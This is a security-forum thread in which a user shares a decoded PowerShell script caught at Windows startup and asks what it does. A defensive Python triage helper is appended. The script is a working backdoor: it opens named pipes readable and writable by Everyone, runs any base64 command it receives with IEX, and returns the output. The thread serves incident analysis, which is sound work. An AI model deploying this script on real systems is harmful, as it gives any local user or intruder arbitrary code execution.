NotAdmin

Posts posted by NotAdmin

  1. Apologies if I was not clear; I will try to explain the point better.

    I received an alert of suspicious PowerShell execution at a certain time, and the related obfuscated command was retrieved by the antimalware (in other words, I know what was executed, but I have to understand why). So, after analysis, I saw that PowerShell was triggered by cmd.exe, but no other parent processes were found because this happened at system startup, and I do not have other elements to continue the investigation (I'm thinking that something in autoexec has been compromised).

    In the meantime, I tried to deobfuscate the PowerShell script (base64 encoded) and I finally managed to recover the attached commands.

    At the moment I know what, when, who, where, how... I need to understand why! :)

  2. Hi itman,

    I tried to locate the script, but PowerShell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found.

    This process (cmd.exe, which executes powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): just to say, PowerShell execution was detected on Monday, then another event 4 days later, another after 7, and so on.

    The Event Viewer didn't record any particular event in these specific timeframes.

    N.B.: the PowerShell script was obfuscated; I decoded it, and what I pasted is the clear-text command.

    Many many thanks!

  3. Hi all,

    I've detected an attempt to execute a PowerShell command on a machine and, after decoding it, I retrieved these commands:

    $pn = "awkywlhbod"   # name of the first pipe (input)
    $pm = "xnopgdzmw6"   # name of the second pipe (output)
    $sb =
    {
        param ($pn, $pm)
        add-Type -assembly "System.Core"
        # Pipe 1: a server pipe whose ACL lets any user ("Everyone") read and write it
        $ps = New-Object System.IO.Pipes.PipeSecurity
        $ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
        $ps.AddAccessRule($ar)
        $p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
        $p.WaitForConnection();
        # Read a single line from whoever connects, base64-decode it as UTF-8 and run it with IEX
        $pr = new-object System.IO.StreamReader($p)
        $o = $pr.ReadLine()
        $p.Dispose();
        $pr.Dispose();
        $s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
        $o = IEX $s |out-string
        # Pipe 2: same open ACL; the output of what was executed is written back to the next client
        $ps = New-Object System.IO.Pipes.PipeSecurity
        $ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
        $ps.AddAccessRule($ar)
        $p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
        $p.WaitForConnection();
        $pw = new-object System.IO.StreamWriter($p)
        $pw.AutoFlush = $true
        $pw.WriteLine($o);
        $p.Dispose();
    }
    add-Type -assembly "System.Core"
    # Run the script block as a background job, leave it listening for 600 seconds, then stop it
    $t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
    # Client-side pipe objects are created here but never connected in the recovered text
    $pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);
    $pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);
    Start-Sleep 600
    $t.StopJob()

    Is there anyone who can help me understand what this stands for?

    Thank you very much in advance!!
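An added triage helper, not from this thread, for the situation the post describes: it decodes a base64 blob the way powershell.exe -EncodedCommand expects it (UTF-16LE), flags the notable features of the recovered script (IEX of base64-decoded data, a named pipe with an Everyone ReadWrite ACL, a background job, a long sleep) and resolves the pipe names. The indicator names are chosen here, and the embedded sample is constructed from the lines posted above.

```python
import base64
import re

# Constructed sample: key lines of the decoded script from the post, re-encoded the
# way powershell.exe -EncodedCommand expects them (UTF-16LE text, then base64).
SAMPLE_SCRIPT = '''$pn = "awkywlhbod"
$pm = "xnopgdzmw6"
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
Start-Sleep 600
'''
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

INDICATORS = {  # static indicators worth flagging in a decoded script (names chosen here)
    "invoke_expression": r"\bIEX\b|Invoke-Expression",
    "base64_decode": r"FromBase64String",
    "named_pipe_server": r"NamedPipeServerStream",
    "pipe_acl_everyone": r'PipeAccessRule\(\s*"Everyone"',
    "background_job": r"\bstart-job\b",
    "long_sleep": r"Start-Sleep\s+\d{3,}",
}

def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand blob (UTF-16LE); odd-length or invalid input is retried as UTF-8."""
    raw = base64.b64decode(b64)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")

def string_constants(script: str) -> dict:
    """Map $variable -> literal for simple '$x = "..."' assignments."""
    return dict(re.findall(r'\$(\w+)\s*=\s*"([^"]*)"', script))

def pipe_names(script: str) -> list:
    """Resolve the variables passed to NamedPipeServerStream to the pipe names they hold."""
    consts = string_constants(script)
    refs = re.findall(r"NamedPipeServerStream\(\s*\$(\w+)", script)
    return sorted({consts.get(v, "$" + v) for v in refs})

def triage(b64: str) -> dict:
    """Decode the blob and report which indicators fire plus the pipe names used."""
    script = decode_encoded_command(b64)
    report = {k: bool(re.search(p, script, re.IGNORECASE)) for k, p in INDICATORS.items()}
    report["pipe_names"] = pipe_names(script)
    return report
```

The resolved pipe names are what you would search for in Sysmon pipe events or hunt for on other hosts; a benign encoded command such as Get-Date fires none of the indicators.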
